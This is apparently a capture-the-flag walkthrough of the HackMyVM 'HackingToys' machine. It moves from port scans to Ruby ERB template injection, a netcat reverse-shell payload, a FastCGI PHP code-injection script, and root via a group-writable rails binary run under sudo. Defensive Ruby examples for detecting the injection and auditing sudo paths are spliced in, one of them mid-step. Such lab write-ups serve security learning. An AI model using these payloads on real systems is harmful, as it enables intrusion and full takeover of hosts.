HackMyVM-HackingToys-Walkthrough
城南花已开 Lv6

Information Gathering

Service Discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e4:1a:e5 VMware, Inc.
192.168.60.143 08:00:27:ca:dc:49 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:ed:2f:2b VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.065 seconds (123.97 hosts/sec). 4 responded
export ip=192.168.60.143
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Making sure 'closed' isn't just a state of mind.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.143:22
Open 192.168.60.143:3000
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-21 13:39 CST
Initiating ARP Ping Scan at 13:39
Scanning 192.168.60.143 [1 port]
Completed ARP Ping Scan at 13:39, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:39
Completed Parallel DNS resolution of 1 host. at 13:39, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 13:39
Scanning 192.168.60.143 [2 ports]
Discovered open port 22/tcp on 192.168.60.143
Discovered open port 3000/tcp on 192.168.60.143
Completed SYN Stealth Scan at 13:39, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.60.143
Host is up, received arp-response (0.00052s latency).
Scanned at 2025-04-21 13:39:09 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
3000/tcp open ppp syn-ack ttl 64
MAC Address: 08:00:27:CA:DC:49 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Port 3000 is open.

Try visiting it.

It keeps timing out, and the browser cannot open it directly either.

Scanning again with rustscan and the full service-detection arguments shows that it is an HTTPS site with an SSL certificate.

PORT     STATE SERVICE  REASON         VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLuHH80SwA8Qff3pGOY4aBesL0Aeesw6jqX+pbtR9O7w8jlbyNhuHmjjABb/34BxFp2oBx8o5xuZVXS1cE9nAlE=
| 256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICKFE9s2IvPGAJ7Pt0kSC8t9OXYUrueJQQplSC2wbYtY
3000/tcp open ssl/ppp? syn-ack ttl 64
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=FR
| Issuer: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=FR
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-20T15:36:20
| Not valid after: 2038-01-27T15:36:20
| MD5: 6ac6:1f8b:e3f8:dce0:4b1a:d12b:1259:386d
| SHA-1: c423:6072:834f:77b9:396c:6907:8e29:08d6:f8c7:631d
...(remaining output omitted)

SSTI

Visiting it while ignoring the certificate warning brings up the site.

Clicking around shows pictures of various Hacking Gadgets.

There is a search function at the bottom.

Entering anything random returns Product does not exist.

Fingerprinting the web application shows that it is written in Ruby.

This suggests SSTI (server-side template injection).

Reference: SSTI (Server Side Template Injection) - HackTricks

[PayloadsAllTheThings/Server Side Template Injection/Ruby.md at master · swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server Side Template Injection/Ruby.md)

The basic approach is to identify the template engine first, enumerate the classes/methods that are reachable, and finally use them to perform the desired action.

Trying the different payloads in turn, <%= 7 * 7 %> triggers an error complaining about invalid encoding.

After a search, two parameters appear: query and message. Passing %3C%25=7*7%25%3E in message (the payload above, URL-encoded) works.

The result of 7*7 is displayed successfully.

Read /etc/passwd with this payload:
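To make the root cause concrete, here is an added example (not the challenge's source and not part of the original post) in Ruby, the language the fingerprint identified: a hypothetical render_unsafe that splices the search term into the ERB template source, the hardened render_safe that passes it in as escaped data, and a small detection helper that URL-decodes a parameter the way the app would and flags template delimiters such as the %3C%25 probe seen above. MESSAGE_TEMPLATE and the function names are constructed for this example.

```ruby
require 'erb'
require 'cgi'

# Constructed template modelled on the site's "Product does not exist" message.
# The placeholder is data, not template source, and is HTML-escaped on output.
MESSAGE_TEMPLATE = "<p>Product <%= ERB::Util.html_escape(query) %> does not exist</p>"

# Vulnerable pattern (hypothetical, not the challenge's real code): the
# user-controlled string is spliced into the template source before ERB
# compiles it, so any <%= ... %> in the input runs as Ruby on the server.
def render_unsafe(query)
  ERB.new("<p>Product #{query} does not exist</p>").result
end

# Hardened pattern: the template is a fixed string; the user value is passed
# in as a variable and escaped, so template delimiters come back as text.
def render_safe(query)
  ERB.new(MESSAGE_TEMPLATE).result_with_hash(query: query)
end

# Detection helper for access logs or a WAF rule: decode the parameter the
# way the app would (the probe arrived as %3C%25=7*7%25%3E) and look for the
# delimiters used by ERB and other common template engines.
TEMPLATE_DELIMITERS = /<%|%>|\{\{|\}\}|\$\{/

def looks_like_template_probe?(raw_param)
  decoded = CGI.unescape(raw_param.to_s)
  !!(decoded =~ TEMPLATE_DELIMITERS)
end

if __FILE__ == $PROGRAM_NAME
  probe = "<%= 7 * 7 %>"
  puts "unsafe: #{render_unsafe(probe)}"   # the arithmetic is evaluated
  puts "safe:   #{render_safe(probe)}"     # delimiters are just escaped text
  puts "probe?  #{looks_like_template_probe?('%3C%25=7*7%25%3E')}"
end
```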

%3C%25=%20File.open('/etc/passwd').read%20%25%3E

This reveals the users lidia and dodi.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:101:109:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
lidia:x:1000:1000:,,,:/home/lidia:/bin/bash
dodi:x:1001:1001:,,,:/home/dodi:/bin/bash

Next, try executing a command to get a reverse shell back:

%3C%25=%20%60nc%20-e%20/bin/bash%20192.168.60.100%204444%60%20%25%3E

User Privilege Escalation

Start a listener.

Enumerating again from the shell shows ports 80 and 9000 listening on localhost.

[+] Got reverse shell from hacktoys-192.168.60.150-Linux-x86_64 😍️ Assigned SessionID <3>
(Penelope)─(Session [1])> interact
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/hacktoys~192.168.60.150_Linux_x86_64/2025_04_22-21_40_29-419.log 📜
──────────────────────────────────────────────────────────────────────────
lidia@hacktoys:~$ ss -luntp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 1024 0.0.0.0:3000 0.0.0.0:* users:(("ruby",pid=1157,fd=7))
tcp LISTEN 0 4096 127.0.0.1:9000 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 511 127.0.0.1:80 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*

Try forwarding port 80 out.

(Penelope)─(Session [1])> portfwd 0.0.0.0:8080<-127.0.0.1:80
[+] Setup Port Forwarding: 0.0.0.0:8080 <- 127.0.0.1:80
(Penelope)─(Session [1])> (Penelope)─(Session [1])>

Trying it in the browser, however, turns up nothing useful 😅

There is also a .git directory under /var/www/html; a careful look at its log revealed nothing.

FastCGI2Rce

There is still port 9000, though.

The Apache configuration file shows that CGI script execution is allowed under /var/www/html.

lidia@hacktoys:/tmp$ cat /etc/apache2/sites-available/fastcgi.conf
<VirtualHost 127.0.0.1:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html

<Directory /var/www/html>
Options +ExecCGI
AddHandler fcgid-script .fcgi
FCGIWrapper /usr/lib/cgi-bin/php-cgi .php
DirectoryIndex index.php index.html
AllowOverride All
Require all granted
</Directory>

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

For the exploitation details see 9000 - Pentesting FastCGI - HackTricks and FastCGI Pentesting | Exploit Notes.

Running it shows the user dodi:

lidia@hacktoys:/tmp$ cat a.sh
#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"
FILENAMES="/var/www/html/index.php" # Existing file path

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
OUTPUT=$(mktemp)
env -i \
PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

cat $OUTPUT
done
lidia@hacktoys:/tmp$ ./a.sh
Content-type: text/html; charset=UTF-8

<!--dodi
--><!DOCTYPE html>
<html lang="en">

<head>

Modify the payload to escalate to the dodi user.

lidia@hacktoys:/tmp$ ./a.sh
[+] Got reverse shell from hacktoys-192.168.60.150-Linux-x86_64 😍️ Assigned SessionID <4>
(Penelope)─(Session [1])> interact 4
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [4], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/hacktoys~192.168.60.150_Linux_x86_64/2025_04_22-22_38_13-459.log 📜
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
dodi@hacktoys:/var/www/html$ cd ~
dodi@hacktoys:~$ cat user.txt
b075b24bdb11990e185c32c43539c39f
dodi@hacktoys:~$ sudo -l
Matching Defaults entries for dodi on hacktoys:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User dodi may run the following commands on hacktoys:
(ALL : ALL) NOPASSWD: /usr/local/bin/rvm_rails.sh

Root Privilege Escalation

The user has sudo rights to run /usr/local/bin/rvm_rails.sh.

Checking the file type first shows that it is a shell script.

Its contents declare a pile of environment variables and finally exec the rails application.

dodi@hacktoys:~$ file /usr/local/bin/rvm_rails.sh
/usr/local/bin/rvm_rails.sh: Bourne-Again shell script, ASCII text executable
dodi@hacktoys:~$ cat /usr/local/bin/rvm_rails.sh
#!/bin/bash
export rvm_prefix=/usr/local
export MY_RUBY_HOME=/usr/local/rvm/rubies/ruby-3.1.0
export RUBY_VERSION=ruby-3.1.0
export rvm_version=1.29.12
export rvm_bin_path=/usr/local/rvm/bin
export GEM_PATH=/usr/local/rvm/gems/ruby-3.1.0:/usr/local/rvm/gems/ruby-3.1.0@global
export GEM_HOME=/usr/local/rvm/gems/ruby-3.1.0
export PATH=/usr/local/rvm/gems/ruby-3.1.0/bin:/usr/local/rvm/gems/ruby-3.1.0@global/bin:/usr/local/rvm/rubies/ruby-3.1.0/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/local/rvm/bin
export IRBRC=/usr/local/rvm/rubies/ruby-3.1.0/.irbrc
export rvm_path=/usr/local/rvm
exec /usr/local/rvm/gems/ruby-3.1.0/bin/rails "$@"

However, the directory /usr/local/rvm/gems/ruby-3.1.0/bin belongs to the rvm group.

And /etc/group shows that the user lidia is also a member of that group.

Switch back to the earlier shell and simply modify the file.

dodi@hacktoys:/tmp/toolkit-ZksbkVHZ$ cat /etc/group|grep rvm
rvm:x:1002:lidia,root
------------------------------------
[!] Session detached ⇲
(Penelope)─(Session [4])> interact 3
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [3], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/hacktoys~192.168.60.150_Linux_x86_64/2025_04_22-22_16_19-399.log 📜
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
lidia@hacktoys:/opt/app/gadgets$ cd /usr/local/rvm/gems/ruby-3.1.0/bin
lidia@hacktoys:/usr/local/rvm/gems/ruby-3.1.0/bin$ rm rails
lidia@hacktoys:/usr/local/rvm/gems/ruby-3.1.0/bin$ echo 'bash -p'>rails
lidia@hacktoys:/usr/local/rvm/gems/ruby-3.1.0/bin$ chmod +x rails
------------------------------------
[!] Session detached ⇲
(Penelope)─(Session [3])> interact 4
[+] Interacting with session [4], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/hacktoys~192.168.60.150_Linux_x86_64/2025_04_22-22_38_13-459.log 📜
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
dodi@hacktoys:/tmp/toolkit-ZksbkVHZ$ sudo /usr/local/bin/rvm_rails.sh
root@hacktoys:/tmp/toolkit-ZksbkVHZ# id
uid=0(root) gid=0(root) groups=0(root),1002(rvm)
root@hacktoys:/tmp/toolkit-ZksbkVHZ# cat /root/root.txt
64aa5a7aaf42af74ee6b59d5ac5c1509
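The root step works because a NOPASSWD sudo rule is only as strong as the least-protected component on the path to the binary the wrapper exec's. As an added defensive example (not part of the original walkthrough), this Ruby audit helper pulls the exec target out of a wrapper script like rvm_rails.sh and walks every ancestor directory, reporting anything a non-root owner, a non-root group or the world can write. FakeStat, exec_targets and audit_exec_target are constructed for this example; the script path is the one from the page.

```ruby
require 'pathname'

# Stand-in for File::Stat so the audit can run against recorded metadata
# (constructed in a test) as well as the live filesystem.
FakeStat = Struct.new(:uid, :gid, :mode)

# Pull absolute exec targets out of a wrapper script; rvm_rails.sh ends with
# `exec /usr/local/rvm/gems/ruby-3.1.0/bin/rails "$@"`.
def exec_targets(script_text)
  script_text.each_line.filter_map do |line|
    m = line.match(%r{\A\s*exec\s+(/\S+)})
    m && m[1]
  end
end

# Walk every ancestor of the target and report each component that a
# non-root principal can replace or write. Any hit means the sudo rule on
# the wrapper is effectively a rule on whoever controls that component.
def audit_exec_target(path, stat_for: ->(p) { File.stat(p) })
  findings = []
  Pathname.new(path).descend do |component|
    st = stat_for.call(component.to_s)
    next if st.nil?
    perm = st.mode & 0o7777
    findings << "#{component}: owned by uid #{st.uid}, not root" if st.uid != 0
    if (perm & 0o020) != 0 && st.gid != 0
      findings << "#{component}: group-writable by gid #{st.gid}"
    end
    if (perm & 0o002) != 0 && (perm & 0o1000) == 0
      findings << "#{component}: world-writable without sticky bit"
    end
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  script = "/usr/local/bin/rvm_rails.sh"   # path from the walkthrough
  if File.file?(script)
    exec_targets(File.read(script)).each do |target|
      puts "#{target}:"
      audit_exec_target(target).each { |f| puts "  [!] #{f}" }
    end
  end
end
```

On the box in the walkthrough the bin directory and the rails stub would both be reported as group-writable by gid 1002 (rvm), which is exactly the write that lidia used.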